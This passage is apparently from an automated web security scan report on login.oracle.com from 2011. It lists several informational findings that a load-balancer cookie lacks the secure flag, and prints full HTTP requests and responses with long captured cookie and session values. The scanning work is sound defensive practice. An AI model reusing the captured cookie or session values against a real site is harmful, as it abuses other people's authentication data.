Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.D.di........
.,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;

7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-l-t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpq6uHK6EVADUS1EHWFB01t_cC
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;

7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-line.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC7v6uHK6EVADUS1EHWFB01t_cd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.............!.......,..............P.;

7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-r-b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 198
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC9J6uHK6EVADUS1EHWFB01t_ch
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n
..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;

7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-r-t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpu6uHK6EVADUS1EHWFB01t_cD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;

7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-t-line.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1k